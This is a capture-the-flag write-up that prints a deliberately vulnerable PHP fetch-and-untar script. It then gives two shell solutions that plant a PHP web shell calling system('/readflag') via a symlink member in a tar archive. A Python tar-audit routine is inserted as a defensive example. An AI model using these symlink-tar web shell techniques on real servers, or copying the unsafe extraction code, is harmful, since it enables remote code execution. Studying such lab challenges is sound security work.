<?php
$sandbox = "sandbox/" . md5($_SERVER["REMOTE_ADDR"]);
echo $sandbox."</br>";
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET["url"]) && !preg_match('/^(http|https):\/\/.*/', $_GET["url"])) die();
$url = str_replace("|", "", $_GET["url"]);
$data = shell_exec("GET " . escapeshellarg($url));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
shell_exec("UNTAR ".escapeshellarg(basename($info["basename"])));
highlight_file(__FILE__);
Pieced together from two original challenges:
https://lihuaiqiu.github.io/2019/07/13/BUUCTF-Writeup-%E4%B8%80/


https://www.anquanke.com/post/id/86987
http://knqyf263.hatenablog.com/entry/2018/06/27/181037
http://ip:port/?url=http://xxxxxxxxxxx/cmd.tar&filename=/abc/cmd.tar
The resulting shell ends up at /sandbox/cmd.php; requesting it returns the flag.
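The UNTAR step in the challenge source extracts whatever archive was fetched, and both solutions on this page depend on a symlink member inside that archive being followed at extraction time. As an added defensive example (not part of this writeup or of the challenge code), the following Python audits a tar archive before anything is extracted and rejects link members, special files and any path that would land outside the extraction directory, so it also covers plain `../` traversal, not only the symlink case discussed here. The extraction directory `/tmp/sandbox` and the sample archive are constructed for illustration; the sample mirrors the archive shape described on this page (a symlink member named cmd.php pointing into the web root) plus one harmless file and one traversal entry.

```python
import io
import os
import posixpath
import tarfile


def _escapes(dest: str, member_path: str) -> bool:
    """True if member_path, joined onto dest, resolves outside dest."""
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, member_path))
    return os.path.commonpath([dest_real, target]) != dest_real


def audit_tar(archive: bytes, dest: str = "/tmp/sandbox") -> list:
    """Return (member name, reason) for every entry that must not be extracted.

    An empty list means the archive holds only regular files and directories
    whose names stay inside dest. dest is an assumed extraction directory.
    """
    problems = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for m in tar.getmembers():
            if m.issym() or m.islnk():
                # Link members are what lets an archive write through to a
                # path outside the sandbox (the technique this page describes).
                problems.append((m.name, f"link member pointing to {m.linkname!r}"))
            elif not (m.isfile() or m.isdir()):
                problems.append((m.name, "special file (device/fifo)"))
            elif posixpath.isabs(m.name) or _escapes(dest, m.name):
                problems.append((m.name, "path escapes extraction directory"))
    return problems


def safe_member_names(archive: bytes, dest: str = "/tmp/sandbox") -> list:
    """Names of the members that passed the audit, in archive order."""
    rejected = {name for name, _ in audit_tar(archive, dest)}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        return [m.name for m in tar.getmembers() if m.name not in rejected]


def build_sample_archive() -> bytes:
    """Constructed sample archive (not a real capture)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        # Symlink member shaped like the one in this page's solutions.
        link = tarfile.TarInfo("cmd.php")
        link.type = tarfile.SYMTYPE
        link.linkname = "/var/www/html/sandbox/cmd.php"
        tar.addfile(link)

        # Harmless regular file that should be allowed through.
        payload = b"just some notes\n"
        safe = tarfile.TarInfo("notes.txt")
        safe.size = len(payload)
        tar.addfile(safe, io.BytesIO(payload))

        # Classic traversal entry, also rejected.
        trav = tarfile.TarInfo("../outside.txt")
        trav.size = 0
        tar.addfile(trav)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in audit_tar(build_sample_archive()):
        print(f"REJECT {name}: {reason}")
    print("allowed:", safe_member_names(build_sample_archive()))
```

In a handler like the one above, the audit would run between `file_put_contents` and the extraction call, and the archive would be discarded if the list is non-empty; the audit is only meaningful if the extractor itself is also run with symlink and traversal protections, since an archive can be swapped between check and use.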

Solution 1:
ln -s /var/www/html/sandbox/xb1700.php xbox
tar -cf 3.tar
echo '<?php echo system("/readflag");' >xbox
tar -rf 3.tar xbox
/?url=http://xxx/xbox.tar&filename=xbox.tar

Solution 2:
ln -s /var/www/html/sandbox/cmd.php cmd.php
cat <<EOF > foo
<?php system("/readflag");
EOF
tar cvf cmd.tar * --transform='s/foo/cmd.php/g'
tar -tvvf cmd.tar
